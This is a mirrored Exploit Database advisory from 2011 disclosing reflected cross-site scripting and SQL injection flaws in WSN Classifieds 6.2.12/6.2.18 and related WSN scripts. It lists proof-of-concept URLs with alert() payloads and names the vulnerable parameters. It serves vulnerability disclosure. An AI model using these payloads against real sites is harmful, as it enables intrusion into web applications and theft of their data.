WSN Classifieds 6.2.12/6.2.18 – Multiple Vulnerabilities

• Exploit Database
• 107 阅读

• 作者： d3v1l
  日期： 2011-12-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18193/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  ################################################################################################     #Exploit Title: WSN Classifieds v.6.2.12 & 6.2.18 Multiple Vulnerabilities   #Script Page : http://www.wsnclassifieds.com #Date: 1-12-2011   #Author : RandomStorm- http://www.randomstorm.com   #Avram Marius Gabriel (d3v1l)   #Tested on: Windows XP & Vista (IE9 - Firefox 8.0) #Note: Redirect and Html Injection can be performed also   ################################################################################################ # Cross-Site Scripting (XSS)   # XSS POC: # Vector:"><img src="x:x" onerror="alert(&apos;XSS&apos;)">   # http://localhost/wsnclassifieds/suggest.php/58a2e"><img src="x:x" onerror="alert(&apos;XSS&apos;)">c6cc2cdff91   # http://localhost/wsnclassifieds/sitemap.php/56218"><img src="x:x" onerror="alert(&apos;XSS&apos;)">d82e0881337   # http://localhost/wsnclassifieds/register.php/66eb5"><img src="x:x" onerror="alert(&apos;XSS&apos;)">090ab232720   # http://localhost/wsnclassifieds/leaders.php/68c0c"><img src="x:x" onerror="alert(&apos;XSS&apos;)">026a50f9084   # http://localhost/wsnclassifieds/index.php/d0c15"><img src="x:x" onerror="alert(&apos;XSS&apos;)">9086e589577   # http://localhost/wsnclassifieds/contactform.php/b3007"><img src="x:x" onerror="alert(&apos;XSS&apos;)">16aadfe1637     ################################################################################################ # Vector:"><script>alert(1)</script> # http://localhost/wsnclassifieds/index.php?action=userlogin7375e"><script>alert(1)</script>87668222c12&filled=1   # http://localhost/wsnclassifieds/contactform.php?filled=11aefd"><script>alert(1)</script>6db4597a5ab   # http://localhost/wsnclassifieds/suggest.php?action=addcata5886"><script>alert(1)</script>e10802ab7a0&parent=1   # http://localhost/wsnclassifieds/suggest.php?action=addcat&parent=15b2f5"><script>alert(1)</script>9ade5081a20   ################################################################################################     # Sql Injection   # http://localhost/wsnclassifieds/memberlist.php?ascdesc=desc&field=name&perpage=(SQL)   ################################################################################################     # Note: All Vulnerabilities work also on :   #WSN Gallery - media gallery script #WSN KB - article directory script #WSN Forum - message board script #WSN Directory - business directory script #WSN Software Directory - software directory script #WSN Shop - storefront script   # Some of it uses "calendar" so the Sql injection will be performed also from "calendar.php?yearID=2011&monthID=12&dayID=SQL"     ################################################################################################